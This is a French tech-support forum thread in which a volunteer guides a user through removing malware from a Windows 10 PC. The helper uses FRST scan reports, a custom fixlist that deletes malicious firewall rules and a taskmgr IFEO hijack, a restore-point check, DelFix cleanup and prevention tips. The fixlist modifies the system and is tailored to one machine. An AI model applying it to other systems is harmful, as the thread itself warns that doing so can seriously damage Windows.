    Pour répondre , soit vous utilisez Edge , soit vous installez Chrome avec le fichier téléchargé ...
    m
    0
    l
    30 Avril 2017 22:52:44

    Bonsoir

    Vous avez parfaitement éxécuté les instructions.
    Le rapport est tres encourageant .

    Pourriez vous relancer FRST , en mode analyse , cocher la case addition.txt , et me poster les deux rapports :
    FRST.txt
    addition.txt

    La manip est la meme que dans mon premier message , n'oubliez pas de cocher addition.txt

    Merci
    m
    0
    l
    1 Mai 2017 10:20:48

    Bonjour , Mirabelle55

    Ca m'a l'air bien , tout ca ..

    J'ai vu que vous avez réinstallé Chrome .
    Vous avez aussi désinstallé avast ..

    C'est presque terminé .

    Je finis d'étudier les rapports

    Bonne journée également ..
    m
    0
    l
    1 Mai 2017 10:23:23

    Re
    J'oubliais de vous demander :

    Comment se comporte le pc , apres la désinfection ?
    Toujours des réactions bizarres ?
    m
    0
    l
    1 Mai 2017 12:47:47

    Re...j ai eu encore un truc ce matin oui, genre j'ai cliqué par inadvertance et je me retrouve avec des infos codées sur le coté de mon écran, je ferme la ptite fenêtre et tout rentre dans l'ordre :-)
    oui j ai supprimé avast, un conseil quant au choix de l'antivirus ?
    m
    0
    l
    1 Mai 2017 16:41:04

    Re
    C'est bizarre , ce qui est arrivé .
    Vous pourriez poster une capture ecran de ce phénomene ?

    Pour l'antivirus , avast est souvent désigné comme le plus performant .
    Voir ici :
    http://www.tomsguide.fr/forum/id-2114006/configuration-...

    C'est l'utilisateur , par son comportement , qui est quand meme le meilleur antivirus.
    Mais il en faut quand meme un d'installé ...

    Je vous dirai pour terminer la désinfection .....

    m
    0
    l
    1 Mai 2017 16:56:41

    Bonjour,
    Avant de mettre quoi que ce soit sur ton PC, fait un nettoyage avec CCleaner et adwcleaner. Quand c'est fait, tu redémarre ton PC et tu regardes bien ce que ça donne.
    Prends des notes éventuellement et reviens nous donner les résultats.
    Je viens de voir que "longaripa" s'occupe de toi, Ok.
    Ah ! Une petite chose, un petit truc pour accorder des verbes, quand tu n'es pas certaine de la terminaison en "é" ou "er" remplace le par le verbe "prendre". Si le verbe prendre s'écrit à l'infinitif (prendre) alors le verbe est également à l'infinitif (er).
    Donc tu as bien écrit "récupéré" mais il fallait écrire "installer". Beaucoup de gens sont embarrassés avec deux verbes qui se suivent, ils ne savent jamais s'il faut écrire "é" ou "er". La règle est la suivante, quand deux verbes se suivent le deuxième est toujours à l'infinitif.
    J'espère t'avoir aidé "é" (Avoir est pourtant un verbe me diras-tu ?). C'est vrai, mais dans ce cas précis, c'est surtout un auxiliaire et c'est particulier. Mais applique la première astuce, remplace par prendre et tu verras que pour avoir du sens il faudrait écrire "pris" donc "aidé" n'est pas à l'infinitif. Une règle de grammaire et une astuce qui se complètent bien.
    Eric.
    m
    0
    l
    1 Mai 2017 17:11:49

    Merci pour l'astuce, il s'agit juste d'une étourderie désolée...je suis moi aussi victime d'un virus lol ! doit on réviser aussi la conjugaison par la même occasion ? ;-) fais...ceci....tu redémarres.....:-) cela étant merci pour les conseils et remarques j'essaierai à l'avenir d'être plus vigilante ! :-)
    m
    0
    l
    a c 614 8 Sécurité
    1 Mai 2017 17:53:29

    Bonjour,

    Je suis le formateur qui supervise cette DST, je m'adresse juste :
    @ eric bertolaso : merci de ne pas intervenir dans un sujet de désinfection, conformément aux règles de cette section, pour le bon déroulement des procédures.

    @ Mirabelle55 : merci d'ignorer le message de cet utilisateur et poursuivre avec longaripa
    Je repars ;) 

    :jap: 
    m
    0
    l
    1 Mai 2017 19:56:10

    bonjour Hyunkel30

    oui merci je suis scrupuleusement et uniquement les instructions de longaripa, décidément, j'ai déjà eu un intervenant au départ qui me demandait de formater mon pc !
    bonne continuation


    m
    0
    l
    2 Mai 2017 10:37:19

    Bonjour ,Mirabelle55

    Pourriez vous répondre à ma question précédente :
    http://www.tomsguide.fr/forum/id-3043952/virus-probable...

    C'est pour essayer de comprendre ce qui a pu se passer , quand vous dites :
    Citation :
    j'ai cliqué par inadvertance et je me retrouve avec des infos codées sur le coté de mon écran, je ferme la ptite fenêtre et tout rentre dans l'ordre :-)


    m
    0
    l
    2 Mai 2017 11:44:22

    Pour la capture d'écran ? il faudrait que ça se reproduise, ai je malencontreusement fait une mauvaise manip, y a t-il encore quelque chose je ne sais pas...
    m
    0
    l
    3 Mai 2017 10:37:22

    Bonjour , Mirabelle55

    Je reviens avec un script que j'espere etre le dernier , pour finir de nettoyer .


    Correction a apporter :

    Désactiver l'antivirus avant la procédure.

    Rappel : Il est important que les deux ,l'outil FRST et le fichier fixlist.txt se trouvent dans le même emplacement, sur le bureau sinon la correction ne fonctionnera pas.
    Même si le logiciel FRST semble bloqué au passage du correctif,le laisser travailler. Le PC va redémarrerer.

    /!\ Ce script a été établi pour cet utilisateur, il ne doit, en aucun cas, être appliqué sur un autre système, au risque de provoquer de graves dysfonctionnement et endommager Windows /!\

    /!\ Attention, les outils ne doivent être lancés qu'une seule fois afin de ne pas fausser les rapports demandés. /!\.

    • Ouvrir le Bloc-notes (Démarrer => Tous les programmes => Accessoires => Bloc-notes).
    • Copier/coller la totalité du contenu de la zone Code ci-dessous dans le Bloc-notes


      start
      CreateRestorePoint:
      CloseProcesses:
      FirewallRules: [{6698EA6D-7C36-4C1D-BC15-89751E9F00A7}] => (Allow) C:\Program Files (x86)\MIO\loader\st1000lm024xhn-m101mbb_s2smj9ed548217.dat
      FirewallRules: [{92BFEF4D-8E46-4E13-81D2-1A3DDABCDEAA}] => (Allow) C:\Program Files (x86)\MIO\loader\st1000lm024xhn-m101mbb_s2smj9ed548217.dat
      IFEO\taskmgr.exe: [Debugger]
      ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Pas de fichier
      HKLM-x32\...\Run: [mcui_exe] => "C:\Program Files\McAfee.com\Agent\mcagent.exe" /runkey
      FirewallRules: [{193928F2-7B25-471F-975A-71BB871134FC}] => (Allow) C:\Program Files\Common Files\mcafee\mcsvchost\McSvHost.exe
      FirewallRules: [{B194703C-BF4A-4A20-B7D3-55CA78908FFE}] => (Allow) C:\Program Files\Common Files\mcafee\mcsvchost\McSvHost.exe
      EmptyTemp:
      end


    • Enregistrer le fichier sur le bureau sous le nom fixlist.txt


    • Fermer toutes les applications, y compris le navigateur
    • Lancer FRST par clic-droit -> Exécuter en tant qu'administrateur
    • Sur le menu principal, cliquer une seule fois sur corriger et patienter le temps de la correction
    • Le pc va demander à redémarrer, accepter cette condition.
      L'outil a créé un rapport de correction Fixlog.txt sur le bureau.

    • Pour les rapports, merci d'utiliser ce service de rapport en ligne : déposer le fichier via "parcourir" et poster simplement les liens obtenus dans votre réponse.
      Une aide à l'utilisation ici



      Sous IE9 ou IE10, le filtre SmartScreen déclenche une alerte. Cliquer sur Actions puis sur Exécuter quand même

      Une fois le pc redémarré , refaites une analyse avec FRST , en cochant la case addition.txt , comme vous l'avez fait précedemment ,

      Vous me posterez donc les 3 rapports :
      fixlog.txt
      FRST.txt
      addition.txt

      Si c'est OK , on pourra finaliser .

    m
    0
    l
    3 Mai 2017 15:08:45

    Re
    merci pour le fixlog .

    Pour les autres , c'est bizarre , en effet .
    Vous pouvez les trouver dans C:\FRST\Logs
    sous la forme FRST_date heure.txt et addition_date heure.txt

    m
    0
    l
    3 Mai 2017 15:30:23

    désolée, je viens de regarder, j'ai bien tous les autres, mais au 3/5 je n'ai que fixlog
    m
    0
    l
    3 Mai 2017 15:44:59

    Re

    Relancez l'analyse avec FRST ..
    m
    0
    l
    3 Mai 2017 17:46:35

    Re

    dans le rapport , il y a beaucoup de fichiers de ce genre : (presque 400 ..)

    2017-05-01 22:16 - 2017-05-01 22:16 - 00000489 _____ C:\Users\Isa\Downloads\CB96.tmp
    2017-05-01 22:16 - 2017-05-01 22:16 - 00000468 _____ C:\Users\Isa\Downloads\D0BB.tmp
    2017-05-01 22:16 - 2017-05-01 22:16 - 00000416 _____ C:\Users\Isa\Downloads\D1EA.tmp
    2017-05-01 22:16 - 2017-05-01 22:16 - 00000377 _____ C:\Users\Isa\Downloads\D90E.tmp

    Est-ce que cela vous évoque quelque chose ?

    Est-ce que vous avez téléchargé quelque chose à ce moment là : le 1er mai , vers 22h15 ?
    Ou utilisé un programme particulier ?
    Ces fichiers sont-ils toujours présents dans le dossier telechargements ?
    m
    0
    l
    3 Mai 2017 17:54:41


    oui ils sont là, je supprime ?
    je ne me souviens pas avoir téléchargé quoi que ce soit...au pire peut-être une image une photo sinon je n'ai réinstallé que google depuis nos échanges
    m
    0
    l
    4 Mai 2017 10:24:20

    Bonjour

    Oui , vous pouvez les supprimer .
    Et surveiller si , d'ici un jour ou deux , ils réapparaissent ou pas .

    autre chose :
    Dans les fix que je vous ai fait faire , il aurait du se créer un point de restauration.
    Or , je n'en vois pas trace dans le rapport addition.txt .

    Il serait intéressant d'en créer un manuellement.

    Click droit sur démarrer >> systeme >> protection du systeme >> créer
    Vous entrez une description , par exemple : " point manuel" ou autre
    Puis créer

    Un message va vous indiquer que c'est effectué , cliquez sur fermer

    Pour vérifier , cliquez sur Restauration du systeme ,puis suivant
    Il va afficher la liste des points de restauration enregistrés .
    N'en choisissez aucun , et ne cliquez pas sur suivant .
    C'est juste pour avoir la liste .

    Pourriez vous me poster cette liste ? les dates et heures ?
    m
    0
    l
    4 Mai 2017 11:08:31

    Bonjour,
    Ok il y a donc ce nouveau point de restauration manuelle de ce jour 4/5 a 10h52
    et un autre automatique le 29/4 à 16h37
    m
    0
    l

    Meilleure solution

    4 Mai 2017 12:00:21

    Re

    C'est bon , les points de restauration se créent bien .
    On va pouvoir terminer :

    Pour l'antivirus , je conseillerais de conserver Windows Defender , intégré à Windows.
    Il est moins lourd et moins envahissant que la plupart des autres antivirus.

    Pour terminer ,un nettoyage des outils utilisés , et quelques conseils :

    ***************************************************************************
    Télécharger DelFix (de Xplode) sur le bureau.

  • Fermer toutes tes fenêtres, puis faites un clic droit -> "Exécuter en tant qu'administrateur" DelFix.exe pour le lancer.
  • Ne pas toucher pas aux options cochées, il ne doit y avoir que : "Supprimer les outils de desinfection"
  • Cliquer sur le bouton "Exécuter"
  • Laisser travailler l'outil.
  • Le rapport est enregistré dans à la base du disque dur, (C:\DelFix.txt généralement) merci de copier-coller son contenu dans la prochaine réponse.

    ***************************************************************************

    /!\ Quelques conseils de prudence et de prévention: /!\


    Des fichiers malveillants se sont introduits sur votre ordinateur, le plus souvent lors d'installation de logiciels téléchargés.
    Ils peuvent ralentir votre ordinateur, vous inonder de publicités , collecter/dérober des informations personnelles, crypter vos fichiers et d'autres actions désagréables.
  • Il faut prendre le temps de lire les conditions d'utilisation qui s'affichent lors d'une installation, avant de les accepter, ou de les refuser .
  • Il faut aussi refuser l'installation de logiciels proposés (par l'intermédiaire de cases cochées d'avance)
  • Ne télécharger des logiciels que sur des sites de confiance , de préférence sur le site de l'éditeur .

    Un peu de lecture : Stop aux pubs et aussi Un exemple d'application "piégée"


    Méfiez vous aussi des pièces jointes reçues dans votre messagerie. Ne cliquez jamais dessus directement.
    Enregistrez la , et scannez la avec un antivirus , et si vous ne connaissez pas l'expéditeur, direction poubelle sans l'ouvrir.

    Méfiez vous de l'utilisation de logiciels P2P,(peer-to-peer,comme µTorrent), cracks ( Ils sont très souvent être infectés).
    A lire aussi !
    N'installez pas de logiciel "miracle" censé accélérer votre ordinateur, ou le réparer.

    Scannez régulièrement votre système avec votre antivirus .
    Maintenez votre système et vos logiciels à jour , surtout l' antivirus et les navigateurs .

    N'oubliez pas qu'un comportement responsable et prudent est la première et la meilleure des protections

    ***************************************************************************

    Si vous avez des questions , n'hésitez pas à les poser ..
    Et j'espere ne plus vous revoir pour ce PC ..... :D 

    partage
    4 Mai 2017 12:59:50

    Re,
    Merci pour les infos et conseils,
    Voici le rapport :
    # DelFix v1.013 - Rapport créé le 04/05/2017 à 12:54:28
    # Mis à jour le 17/04/2016 par Xplode
    # Nom d'utilisateur : Isa - PERSONNEL
    # Système d'exploitation : Windows 10 Home (64 bits)

    ~ Suppression des outils de désinfection ...

    Supprimé : C:\FRST
    Supprimé : C:\Users\Isa\Desktop\FRST-OlderVersion
    Supprimé : C:\Users\Isa\Desktop\Fixlog.txt
    Supprimé : C:\Users\Isa\Desktop\FRST64 (1).exe

    ########## - EOF - ##########
    m
    0
    l
    4 Mai 2017 17:00:52

    Re

    Pour moi , c'est bon .

    Bonne continuation et prudence sur le Web ......
    m
    0
    l
    4 Mai 2017 17:10:20

    Merci tout plein pour votre gentillesse et votre patience :-)
    Bonne continuation

    m
    0
    l
    Tom's guide dans le monde
    • Allemagne
    • Italie
    • Irlande
    • Royaume Uni
    • Etats Unis
    Suivre Tom's Guide
    Inscrivez-vous à la Newsletter
    • ajouter à twitter
    • ajouter à facebook
    • ajouter un flux RSS